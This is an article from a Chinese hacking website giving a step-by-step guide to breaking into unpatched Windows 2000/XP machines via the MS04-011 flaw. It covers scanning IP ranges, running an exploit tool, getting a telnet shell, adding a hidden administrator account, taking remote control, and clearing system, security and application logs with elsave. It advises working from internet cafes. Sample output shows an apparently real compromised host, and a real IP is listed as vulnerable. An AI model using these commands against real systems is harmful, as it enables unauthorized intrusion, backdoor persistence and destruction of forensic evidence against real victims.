设为首页  加入收藏  联系我们 繁體中文  

黑客软件:

  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创


   

  您当前的位置:中华隐士黑客联盟 -> 黑客技术 -> 漏洞利用 -> 文章内容 [站内搜索]  

 
入侵MS04011的手记
作者:不详  来源:转载  发布时间:2007-1-21 12:26:01  发布人:heigeheapao
ms0411的成功入侵过程
登陆很多的黑客网站发现MS0411真的成了大热们!
虽然我知道得比较迟但我想有些老粗知道了也懒得去更正下载补钉!
唉!原来入侵就是那么容易,愿来就那么容易把你干掉了,不过我还是不敢下手!
有一台是同胞的!
好了长话短说啦!去行动吧!
我用了不少方法花了一个晚上,最后我发现这样搭配最快,三分钟不要就行啦!
工具:一个MS04011的工具包
一般的都包括:Dsscan.exe(扫描用的)
getos.exe(判断操作系统的版本)
ms04011.exe(主程序)
另外需要一DameWare NT Utilities 工具
elsave.exe(清理工具)
最重要的是一颗善良的耐心!
在桌面打开www.BAIDU.COM吧
那些所有的工具你都可以打入相关字找到!如找ms04011工具包:
打入ms04011工具 下载 黑客 就可以找到拉!请合理输入关键字!

ACTION:
推荐在win2000运行,在网吧运行.因为我是菜鸟.我暂时很多东西不完全善
不能随便用固定电脑!
先把上面的 getos.exe ms04011.exe elsave.exe 解压缩后COPY到
C 盘winnt目录下!OK
直接点DSSCANNER.EXE 执行输入一个IP段,推荐先下载一些IP库找外国的或台湾的
在扫描信息框中
XXX.XXX.XXX.XXX,"XX","XXX","VULNERABLE" 是成功可用的
点击一个右键选COPY IP TO CLIBOARD
打开CMD的命令行
输入getos.exe xxx.xxx.xxx.xx.回车
显示为2000的系统或更高的配置信息
输入MS04011.EXE 0(对方是WIN2K) IP
如果是XP的操作系统(对方):"0"改为"1"
如果光标停了好一会就可以打开第二个CMD窗口
输入telnet ip 1234 回车
便可登陆出现对方的CMD对话框实际上你可以操作啦!
如DIR 显示对方的目录
如CD X
切换目录到X
CD \回到根目录
.............
一般是把自己的权限提高再说:
net user
net user KEN XXXXXX /ADD (XXXXX是密码)(KEN是用户名)意思是添加用户KEN 密码是XXXXXXX
net localgroup Administrator KEN /add (把KEN添加到管理员的组那边)
net user
你就看到自己是管理员啦!

如果失败试多几次就行!
然后打开DameWare NT Utilities
添加计算机成功连接后
选择远程控制若果是对方的3389没开系统会提示你安装对方的3389终端的!
在这些操作之前可用新建的用户命和密码!
然后请你看DameWare NT Utilities使用说明书
你可以做很多东东哦
看你的发挥啦!
我就看到了对方的屏幕就停拉
自己人啊?
而且对方不知什么工具探测到我的来访我还是撤退!
没人再来!
elsave -s \\xxxxxx -l "system" -C
elsave -s \\xxxxxxx -l "security" -C
elsave -s \\xxxxxxx -l "application" -C
xx是IP
在自己的机上运行CMD 输入上面的命令首先elsave.exe 需在根目录下!

例子
C:\>getos.exe 000 000 000 000
Remote OS:
----------
FAS1.PWC.CO.JP
Windows 2000 LAN Manager
Windows 5.0
C:\>ms04011.exe 0 000 000 000 000
shellcode size 404
Ret value = 1727
telnet 000 000 000 000 1234
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

C:\WINNT\system32>net user
Administrator Guest
The command completed with one or more errors.
C:\WINNT\system32>NET USER KEN /ADD
The command completed successfully.

C:\WINNT\system32>NET LOCALGROUP ADMINISTRATORS KEN /ADD
The command completed successfully.
然后你就用DameWare NT Utilities
自由发挥吧!
好了谢谢看了我那么多的废话
这是我的第一次哦
糟了我忘记清除场!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
不是菜鸟第一次
恳请高手指点!

小榕的elsave.exe远程清除system,applicaton,security的软件,使用方法很简单,首先利用获得的管理员账号与对方建立ipc会话,net use \\ip pass /user: user
然后命令行下:elsave -s \\ip -l application -C,这样就删除了安全日志。
elsave -s \\210.7.248.4 -l system -C
elsave -s \\210.7.248.4 -l applicaton -C
elsave -s \\210.7.248.4 -l security -C
210.7.248.4,"WIENERT-W2K","WIENERT-W2K","VULNERABLE"
[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

  黑客入侵基础知识FT..
搜索型注入的入侵技..
利用手动检测密码,..
系统安全之Bat文件自..
搜狐错链华夏折扣网..
黑客入侵小河政府网..
让硬件入侵不再是神..
识别常见Web应用安全..
防止黑客入侵ADSL的..
用自解压包入侵


 
免费获得Q币的最新方法
最新免费在线看的电影网站集绵
中华隐士黑客联盟
最新QQ空间4.0全屏版效果图!!
不用木马,轻松万能偷盗QQ号码
黑客快速入门(强烈推荐)
本站超级酷的Flash (不看会后悔的..
18岁少女欲6000元卖处女身 救患血..
QQ密码本地破解的原理和方法
揭秘远程破解盗窃QQ密码的各种方..
 
Google Talk今年有望与AOL的AIM实.. 01-21
揭秘“熊猫烧香”肆虐内幕 01-21
WebSphere之父离开IBM加盟微软 01-21
木马各种隐藏技术披露 01-21
首个正版免费电影网络院线启动 01-21
SNMP网络安全性配置指南 01-21
一般路由器的帐号和密码 01-21
QQ盗号木马大揭密 01-21
涉嫌上eBay卖军火两美国大兵被捕.. 01-21
美国访问大于500博客须实名登记 01-21
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com